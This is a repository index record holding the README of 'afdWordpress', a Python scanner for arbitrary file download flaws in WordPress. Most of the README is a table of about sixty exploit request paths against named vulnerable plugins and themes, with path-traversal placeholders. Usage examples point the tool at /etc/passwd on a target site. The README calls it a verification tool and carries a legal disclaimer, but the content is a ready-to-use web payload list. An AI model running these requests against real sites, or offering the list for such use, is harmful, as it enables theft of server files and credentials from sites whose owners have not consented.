{"id":22431149,"url":"https://github.com/mrcl0wnlab/afdwordpress","last_synced_at":"2025-08-01T11:32:52.121Z","repository":{"id":133102681,"uuid":"242032697","full_name":"MrCl0wnLab/afdWordpress","owner":"MrCl0wnLab","description":"Check arbitrary file download vulnerability in the WordPress","archived":false,"fork":false,"pushed_at":"2020-02-21T05:18:46.000Z","size":26,"stargazers_count":20,"open_issues_count":0,"forks_count":9,"subscribers_count":1,"default_branch":"master","last_synced_at":"2023-10-20T21:54:40.280Z","etag":null,"topics":["hacking","python","security","security-tools","wordpress"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/MrCl0wnLab.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2020-02-21T01:58:15.000Z","updated_at":"2023-10-20T21:54:40.762Z","dependencies_parsed_at":null,"dependency_job_id":"9bdd10a0-0963-4b97-9d26-b4d60a69f59b","html_url":"https://github.com/MrCl0wnLab/afdWordpress","commit_stats":null,"previous_names":[],"tags_count":0,"template":null,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MrCl0wnLab%2FafdWordpress","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MrCl0wnLab%2FafdWordpress/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MrCl0wnLab%2FafdWordpress/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MrCl0wnLab%2FafdWordpress/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/MrCl0wnLab","download_url":"https://codeload.githu
b.com/MrCl0wnLab/afdWordpress/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":228372614,"owners_count":17909678,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","python","security","security-tools","wordpress"],"created_at":"2024-12-05T21:22:08.365Z","updated_at":"2024-12-05T21:22:08.952Z","avatar_url":"https://github.com/MrCl0wnLab.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Wordpress A.F.D. Verification\n[![Version](https://img.shields.io/badge/afdWordpress-0.1-brightgreen.svg?maxAge=259200)]()\n[![Python 3.7](https://img.shields.io/badge/Python-3.7-yellow.svg)](https://www.python.org/)\n[![Build](https://img.shields.io/badge/Supported_OS-Linux-orange.svg)]()\n[![Build](https://img.shields.io/badge/Supported_OS-Mac-orange.svg)]()\n![GitHub](https://img.shields.io/github/license/MrCl0wnLab/afdWordpress?color=blue)\n\n## Check arbitrary file download vulnerability in the WordPress\n\n```\n + Autor: MrCl0wn\n + Blog: http://blog.mrcl0wn.com\n + GitHub: https://github.com/MrCl0wnLab\n + Twitter: https://twitter.com/MrCl0wnLab\n + Email: mrcl0wnlab\\@\\gmail.com\n```\n## WARNING\n```\n+------------------------------------------------------------------------------+\n|  [!] Legal disclaimer: Usage of afdWordpress for attacking                   |\n|  targets without prior mutual consent is illegal.                            |\n|  It is the end user's responsibility to obey all applicable                  | \n|  local, state and federal laws.                 
                             |\n|  Developers assume no liability and are not responsible for any misuse or    |\n|  damage caused by this program                                               |\n+------------------------------------------------------------------------------+\n```\n![GitHub](https://i.imgur.com/M7OFyVb.png)\n\n### DESCRIPTION\n```\nThis tool aims to facilitate checking arbitrary file download vulnerability\n```\n### REQUIREMENTS\n```\nthreading\nargparse\ncsv\ncollections\nrandom\nurllib\n```\n### INSTALL\n```\n$ git clone https://github.com/MrCl0wnLab/afdWordpress\n$ cd afdWordpress\n$ pip3.7 install -r requirements.txt\n```\n### HELP\n```\n$ git clone https://github.com/MrCl0wnLab/afdWordpress\n$ cd afdWordpress\n$ python3.7 afd.py --help\n\n\n        ▄████████    ▄████████ ████████▄  \n        ███    ███   ███    ███ ███   ▀███ \n        ███    ███   ███    █▀  ███    ███ \n        ███    ███  ▄███▄▄▄     ███    ███ \n      ▀███████████ ▀▀███▀▀▀     ███    ███ \n        ███    ███   ███        ███    ███ \n        ███    ███   ███        ███   ▄███ \n        ███    █▀    ███        ████████▀ \n        Arbitrary File Download-[ Verifier ]\n        By MrCl0wn\n        \nusage: tool [-h] --url http://url [--file /file.php] [--threads 10]\n\noptional arguments:\n  -h, --help        show this help message and exit\n  --url http://url  URL to request Ex: http://www.host.com\n  --file /file.php  File to fuzzing Ex: /wp-admin.php\n  --threads 10      Threads\n```\n\n### USE\n```\n$ python3.7 afd.py --url https://blog.mrcl0wn.com \n$ python3.7 afd.py --url https://blog.mrcl0wn.com --thread 50\n$ python3.7 afd.py --url https://blog.mrcl0wn.com --thread 50 --file /etc/passwd\n```\n### SOURCE VERIFICATION\n\u003e File: inject.csv\n\n|exploit_uri|pwd_count                    |ref   
|\n|-----------|-----------------------------|------|\n|/?action=cpis_init\u0026cpis-action=f-download\u0026purchase_id=1\u0026cpis_user_email=i0SECLAB@intermal.com\u0026f=_PWD__FILE_|4                            |      |\n|/?mdocs-img-preview=_PWD__FILE_|3                            |      |\n|/mdocs-posts/?mdocs-img-preview=_PWD__FILE_|3                            |      |\n|/wp-admin/admin-ajax.php?action=kbslider_show_image\u0026img=_PWD__FILE_|1                            |      |\n|/wp-admin/admin-ajax.php?action=revslider_show_image\u0026img=_PWD__FILE_|0                            |      |\n|/wp-admin/admin-ajax.php?action=revslider_show_image\u0026img=_PWD__FILE_|1                            |      |\n|/wp-admin/admin.php?page=miwoftp\u0026option=com_miwoftp\u0026action=download\u0026dir=/\u0026item=_PWD__FILE_\u0026order=name\u0026srt=yes|0                            |      |\n|/wp-admin/edit.php?post_type=wd_ads_ads\u0026export=export_csv\u0026path=_PWD__FILE_|1                            |      |\n|/wp-admin/tools.php?content=\u0026wp-attachment-export-download=true|0                            |https://packetstormsecurity.com/files/132693/WordPress-WP-Attachment-Export-0.2.3-Arbitrary-File-Download.html|\n|/wp-admin/tools.php?content=attachment\u0026wp-attachment-export-download=true|0                            |https://packetstormsecurity.com/files/132693/WordPress-WP-Attachment-Export-0.2.3-Arbitrary-File-Download.html|\n|/wp-content/force-download.php?file=_PWD__FILE_|0                            |      |\n|/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=_PWD__FILE_|0                            |      |\n|/wp-content/plugins//asgallDownload.php?imgname=_PWD__FILE_|3                            |      |\n|/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=_PWD__FILE_|3                            |      |\n|/wp-content/plugins/allow-l10n-upload-filename/download.php?id=_PWD__FILE_|3    
                        |      |\n|/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=_PWD__FILE_|3                            |      |\n|/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=_PWD__FILE_|2                            |      |\n|/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=_PWD__FILE_|3                            |      |\n|/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=_PWD__FILE_|10                           |      |\n|/wp-content/plugins/count-per-day/download.php?n=1\u0026f=_PWD__FILE_|0                            |      |\n|/wp-content/plugins/document_manager/views/file_download.php?fname=_PWD__FILE_|2                            |      |\n|/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=_PWD__FILE_\u0026file_size=10|4                            |      |\n|/wp-content/plugins/history-collection/download.php?var=_PWD__FILE_|3                            |      |\n|/wp-content/plugins/hwm_board/download.php?filename=_PWD__FILE_|0                            |      |\n|/wp-content/plugins/hwm_board/download.php?filename=_PWD__FILE_\u0026fileNa=_PWD__FILE_|0                            |      |\n|/wp-content/plugins/image-export/download.php?file=_PWD__FILE_|0                            |      |\n|/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/_PWD__FILE_|0                            |      |\n|/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/_PWD__FILE_|0                            |      |\n|/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/_PWD__FILE_|0                            |      |\n|/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=_PWD__FILE_|0                            |      
|\n|/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=_PWD__FILE_|6                            |      |\n|/wp-content/plugins/recent-backups/download-file.php?file_link=_PWD__FILE_|0                            |      |\n|/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=_PWD__FILE_\u0026path=_PWD__FILE_|7                            |      |\n|/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=_PWD__FILE_|7                            |      |\n|/wp-content/plugins/sermon-shortcodes/download.php?file=_PWD__FILE_|0                            |https://packet..com/files/150507/...bitrary-File-Download.html|\n|/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=_PWD__FILE_|0                            |https://cxsecurity.com/issue/WLB-2018110241|\n|/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=_PWD__FILE_|3                            |https://dl.packe...503-exploits/wpaspose-disclose.txt|\n|/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=_PWD__FILE_|9                            |https://www.exploit-db.com/exploits/37530|\n|/wp-content/plugins/wp-filemanager/incl/libfile.php?\u0026path=_PWD_\u0026filename=_FILE_\u0026action=download|2                            |https://wp.com/vulnerabilities/6499|\n|/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream\u0026path=_PWD__FILE_\u0026name=_PWD__FILE_|0                            |      |\n|/wp-content/plugins/wp-swimteam/include/user/download.php?file=_PWD__FILE_\u0026filename=_PWD__FILE_\u0026contenttype=text/html\u0026transient=1\u0026abspath=/usr/share/wordpress|0                            |https://www.exploit-db.com/exploits/37601|\n|/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=_PWD__FILE_|0                            |      
|\n|/wp-content/themes/acento/includes/view-pdf.php?download=1\u0026file=/path/_PWD__FILE_|0                            |      |\n|/wp-content/themes/antioch/lib/scripts/download.php?file=_PWD__FILE_|5                            |      |\n|/wp-content/themes/authentic/includes/download.php?file=_PWD__FILE_|4                            |      |\n|/wp-content/themes/churchope/lib/downloadlink.php?file=_PWD__FILE_|4                            |      |\n|/wp-content/themes/epic/includes/download.php?file=_PWD__FILE_|0                            |      |\n|/wp-content/themes/erinvale/download.php?file=_PWD__FILE_|3                            |https://dl.pac.../1808-exploits/wpdreamsmiths-disclose.txt|\n|/wp-content/themes/felis/download.php?file=_PWD__FILE_|0                            |      |\n|/wp-content/themes/fiestaresidences/download.php?file=_PWD__FILE_|3                            |https://dl.packe.../1808-exploits/wpdreamsmiths-disclose.txt|\n|/wp-content/themes/hsv/download.php?file=_PWD__FILE_|3                            |https://dl.packet.../1808-exploits/wpdreamsmiths-disclose.txt|\n|/wp-content/themes/linenity/functions/download.php?imgurl=_PWD__FILE_|4                            |      |\n|/wp-content/themes/lote27/download.php?download=_PWD__FILE_|3                            |      |\n|/wp-content/themes/markant/download.php?file=_PWD__FILE_|2                            |      |\n|/wp-content/themes/MichaelCanthony/download.php?file=_PWD__FILE_|3                            |      |\n|/wp-content/themes/mTheme-Unus/css/css.php?files=_PWD__FILE_|4                            |      |\n|/wp-content/themes/NativeChurch/download/download.php?file=_PWD__FILE_|4                            |      |\n|/wp-content/themes/optimus/download.php?file=_PWD__FILE_|3                            |https://dl.pac.../1808-exploits/wpdreamsmiths-disclose.txt|\n|/wp-content/themes/SMWF/inc/download.php?file=_PWD__FILE_|0                            |      
|\n|/wp-content/themes/TheLoft/download.php?file=|3                            |      |\n|/wp-content/themes/trinity/lib/scripts/download.php?file=_PWD__FILE_|5                            |      |\n|/wp-content/themes/urbancity/lib/scripts/download.php?file=_PWD__FILE_|5                            |      |\n|/wp-content/themes/yakimabait/download.php?file=_PWD__FILE_|0                            |      |\n\n### DESCRIPTION FILE\n|exploit_uri|pwd_count                    |ref   |\n|-----------|-----------------------------|------|\n|url_exploit_get| count_mount_pwd             | ref_exploit|\n\n\u003e exploit_uri: GET request URI to test, concatenated with target_url.\n\n\u003e pwd_count: pwd count used by the concatenation loop.\n\n\u003e ref: Reference document for the entry.\n### OUTPUT RESULT\n\u003e ok-file.log\n\n\u003e error-file.log\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmrcl0wnlab%2Fafdwordpress","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmrcl0wnlab%2Fafdwordpress","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmrcl0wnlab%2Fafdwordpress/lists"}